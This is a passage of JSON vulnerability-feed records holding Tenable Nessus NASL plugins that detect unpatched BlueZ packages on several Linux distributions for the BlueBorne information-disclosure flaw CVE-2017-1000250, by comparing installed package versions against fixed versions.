attempted to automatically clean and format\nit as much as possible without introducing additional issues.\");\n # http://repo.virtuozzo.com/vzlinux/announcements/json/VZLSA-2017-2685.json\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?26b736f1\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2017:2685\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bluez / bluez-alsa / bluez-compat / bluez-cups / etc package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:bluez\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:bluez-alsa\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:bluez-compat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:bluez-cups\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:bluez-gstreamer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:bluez-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:bluez-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:virtuozzo:virtuozzo:6\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/11/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Virtuozzo Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Virtuozzo/release\", \"Host/Virtuozzo/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/Virtuozzo/release\");\nif (isnull(release) || \"Virtuozzo\" >!< release) audit(AUDIT_OS_NOT, \"Virtuozzo\");\nos_ver = pregmatch(pattern: \"Virtuozzo Linux release ([0-9]+\\.[0-9])(\\D|$)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Virtuozzo\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Virtuozzo 6.x\", \"Virtuozzo \" + os_ver);\n\nif (!get_kb_item(\"Host/Virtuozzo/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Virtuozzo\", cpu);\n\nflag = 0;\n\npkgs = [\"bluez-4.66-2.vl6\",\n \"bluez-alsa-4.66-2.vl6\",\n \"bluez-compat-4.66-2.vl6\",\n \"bluez-cups-4.66-2.vl6\",\n \"bluez-gstreamer-4.66-2.vl6\",\n \"bluez-libs-4.66-2.vl6\",\n \"bluez-libs-devel-4.66-2.vl6\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"Virtuozzo-6\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_NOTE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bluez / bluez-alsa / bluez-compat / bluez-cups / etc\");\n}\n", "cvss": {"score": 3.3, "vector": "AV:ADJACENT_NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-02-21T01:32:53", "bulletinFamily": "scanner", "description": "An update for bluez is now available for Red Hat Enterprise Linux 6 and Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nThe bluez packages contain the following utilities for use in Bluetooth applications: hcitool, hciattach, hciconfig, bluetoothd, l2ping, start scripts (Red Hat), and pcmcia configuration files.\n\nSecurity Fix(es) :\n\n* An information-disclosure flaw was found in the bluetoothd implementation of the Service Discovery Protocol (SDP). A specially crafted Bluetooth device could, without prior pairing or user interaction, retrieve portions of the bluetoothd process memory, including potentially sensitive information such as Bluetooth encryption keys. (CVE-2017-1000250)\n\nRed Hat would like to thank Armis Labs for reporting this issue.", "modified": "2018-11-10T00:00:00", "id": "CENTOS_RHSA-2017-2685.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=103145", "published": "2017-09-13T00:00:00", "title": "CentOS 6 / 7 : bluez (CESA-2017:2685) (BlueBorne)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2017:2685 and \n# CentOS Errata and Security Advisory 2017:2685 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(103145);\n script_version(\"3.7\");\n script_cvs_date(\"Date: 2018/11/10 11:49:32\");\n\n script_cve_id(\"CVE-2017-1000250\");\n script_xref(name:\"RHSA\", value:\"2017:2685\");\n\n script_name(english:\"CentOS 6 / 7 : bluez (CESA-2017:2685) (BlueBorne)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for bluez is now available for Red Hat Enterprise Linux 6\nand Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Moderate. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe bluez packages contain the following utilities for use in\nBluetooth applications: hcitool, hciattach, hciconfig, bluetoothd,\nl2ping, start scripts (Red Hat), and pcmcia configuration files.\n\nSecurity Fix(es) :\n\n* An information-disclosure flaw was found in the bluetoothd\nimplementation of the Service Discovery Protocol (SDP). A specially\ncrafted Bluetooth device could, without prior pairing or user\ninteraction, retrieve portions of the bluetoothd process memory,\nincluding potentially sensitive information such as Bluetooth\nencryption keys. (CVE-2017-1000250)\n\nRed Hat would like to thank Armis Labs for reporting this issue.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2017-September/022531.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?db53dd90\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2017-September/022535.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c08d2132\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected bluez packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:bluez\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:bluez-alsa\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:bluez-compat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:bluez-cups\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:bluez-gstreamer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:bluez-hid2hci\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:bluez-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:bluez-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:7\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/13\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/CentOS/release\")) audit(AUDIT_OS_NOT, \"CentOS\");\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-6\", reference:\"bluez-4.66-2.el6_9\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"bluez-alsa-4.66-2.el6_9\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"bluez-compat-4.66-2.el6_9\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"bluez-cups-4.66-2.el6_9\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"bluez-gstreamer-4.66-2.el6_9\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"bluez-libs-4.66-2.el6_9\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"bluez-libs-devel-4.66-2.el6_9\")) flag++;\n\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"bluez-5.44-4.el7_4\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"bluez-cups-5.44-4.el7_4\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"bluez-hid2hci-5.44-4.el7_4\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"bluez-libs-5.44-4.el7_4\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"bluez-libs-devel-5.44-4.el7_4\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:rpm_report_get());\n else security_note(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 3.3, "vector": "AV:ADJACENT_NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-02-21T01:32:54", "bulletinFamily": "scanner", "description": "Security Fix(es) :\n\n - An information-disclosure flaw was found in the bluetoothd implementation of the Service Discovery Protocol (SDP). A specially crafted Bluetooth device could, without prior pairing or user interaction, retrieve portions of the bluetoothd process memory, including potentially sensitive information such as Bluetooth encryption keys. (CVE-2017-1000250)", "modified": "2018-12-27T00:00:00", "id": "SL_20170912_BLUEZ_ON_SL6_X.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=103173", "published": "2017-09-13T00:00:00", "title": "Scientific Linux Security Update : bluez on SL6.x, SL7.x i386/x86_64 (BlueBorne)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(103173);\n script_version(\"3.5\");\n script_cvs_date(\"Date: 2018/12/27 10:05:37\");\n\n script_cve_id(\"CVE-2017-1000250\");\n\n script_name(english:\"Scientific Linux Security Update : bluez on SL6.x, SL7.x i386/x86_64 (BlueBorne)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security Fix(es) :\n\n - An information-disclosure flaw was found in the\n bluetoothd implementation of the Service Discovery\n Protocol (SDP). A specially crafted Bluetooth device\n could, without prior pairing or user interaction,\n retrieve portions of the bluetoothd process memory,\n including potentially sensitive information such as\n Bluetooth encryption keys. (CVE-2017-1000250)\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1709&L=scientific-linux-errata&F=&S=&P=422\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?443628ae\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/12\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL6\", reference:\"bluez-4.66-2.el6_9\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"bluez-alsa-4.66-2.el6_9\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"bluez-compat-4.66-2.el6_9\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"bluez-cups-4.66-2.el6_9\")) flag++;\nif (rpm_check(release:\"SL6\", cpu:\"i386\", reference:\"bluez-debuginfo-4.66-2.el6_9\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"bluez-gstreamer-4.66-2.el6_9\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"bluez-libs-4.66-2.el6_9\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"bluez-libs-devel-4.66-2.el6_9\")) flag++;\n\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"bluez-5.44-4.el7_4\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"bluez-cups-5.44-4.el7_4\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"bluez-hid2hci-5.44-4.el7_4\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"bluez-libs-5.44-4.el7_4\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"bluez-libs-devel-5.44-4.el7_4\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:rpm_report_get());\n else security_note(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 3.3, "vector": "AV:ADJACENT_NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-02-21T01:32:55", "bulletinFamily": "scanner", "description": "An information disclosure vulnerability was discovered in the Service Discovery Protocol (SDP) in bluetoothd, allowing a proximate attacker to obtain sensitive information from bluetoothd process memory, including Bluetooth encryption keys.", "modified": "2018-11-10T00:00:00", "id": "DEBIAN_DSA-3972.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=103198", "published": "2017-09-14T00:00:00", "title": "Debian DSA-3972-1 : bluez - security update (BlueBorne)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3972. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(103198);\n script_version(\"3.5\");\n script_cvs_date(\"Date: 2018/11/10 11:49:38\");\n\n script_cve_id(\"CVE-2017-1000250\");\n script_xref(name:\"DSA\", value:\"3972\");\n\n script_name(english:\"Debian DSA-3972-1 : bluez - security update (BlueBorne)\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An information disclosure vulnerability was discovered in the Service\nDiscovery Protocol (SDP) in bluetoothd, allowing a proximate attacker\nto obtain sensitive information from bluetoothd process memory,\nincluding Bluetooth encryption keys.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=875633\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/bluez\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/bluez\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2017/dsa-3972\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the bluez packages.\n\nFor the oldstable distribution (jessie), this problem has been fixed\nin version 5.23-2+deb8u1.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 5.43-2+deb9u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:bluez\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/13\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"bluetooth\", reference:\"5.23-2+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"bluez\", reference:\"5.23-2+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"bluez-cups\", reference:\"5.23-2+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"bluez-dbg\", reference:\"5.23-2+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"bluez-hcidump\", reference:\"5.23-2+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"bluez-obexd\", reference:\"5.23-2+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"bluez-test-scripts\", reference:\"5.23-2+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libbluetooth-dev\", reference:\"5.23-2+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libbluetooth3\", reference:\"5.23-2+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libbluetooth3-dbg\", reference:\"5.23-2+deb8u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"bluetooth\", reference:\"5.43-2+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"bluez\", reference:\"5.43-2+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"bluez-cups\", reference:\"5.43-2+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"bluez-dbg\", reference:\"5.43-2+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"bluez-hcidump\", reference:\"5.43-2+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"bluez-obexd\", reference:\"5.43-2+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"bluez-test-scripts\", reference:\"5.43-2+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"bluez-test-tools\", reference:\"5.43-2+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libbluetooth-dev\", reference:\"5.43-2+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libbluetooth3\", reference:\"5.43-2+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libbluetooth3-dbg\", reference:\"5.43-2+deb9u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:deb_report_get());\n else security_note(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 3.3, "vector": "AV:ADJACENT_NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-02-21T01:33:03", "bulletinFamily": "scanner", "description": "The SDP server in BlueZ is vulnerable to an information disclosure vulnerability which allows remote attackers to obtain sensitive information from the bluetoothd process memory. This vulnerability lies in the processing of SDP search attribute requests.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version 4.99-2+deb7u1.\n\nWe recommend that you upgrade your bluez packages.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2018-07-06T00:00:00", "id": "DEBIAN_DLA-1103.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=103390", "published": "2017-09-22T00:00:00", "title": "Debian DLA-1103-1 : bluez security update (BlueBorne)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-1103-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(103390);\n script_version(\"3.3\");\n script_cvs_date(\"Date: 2018/07/06 11:26:07\");\n\n script_cve_id(\"CVE-2017-1000250\");\n\n script_name(english:\"Debian DLA-1103-1 : bluez security update (BlueBorne)\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The SDP server in BlueZ is vulnerable to an information disclosure\nvulnerability which allows remote attackers to obtain sensitive\ninformation from the bluetoothd process memory. This vulnerability\nlies in the processing of SDP search attribute requests.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version\n4.99-2+deb7u1.\n\nWe recommend that you upgrade your bluez packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2017/09/msg00020.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/bluez\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:bluetooth\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:bluez\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:bluez-alsa\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:bluez-audio\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:bluez-compat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:bluez-cups\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:bluez-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:bluez-gstreamer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:bluez-pcmcia-support\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:bluez-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libbluetooth-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libbluetooth3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libbluetooth3-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/21\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/22\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"bluetooth\", reference:\"4.99-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"bluez\", reference:\"4.99-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"bluez-alsa\", reference:\"4.99-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"bluez-audio\", reference:\"4.99-2+deb7u1\")) flag++;\nif 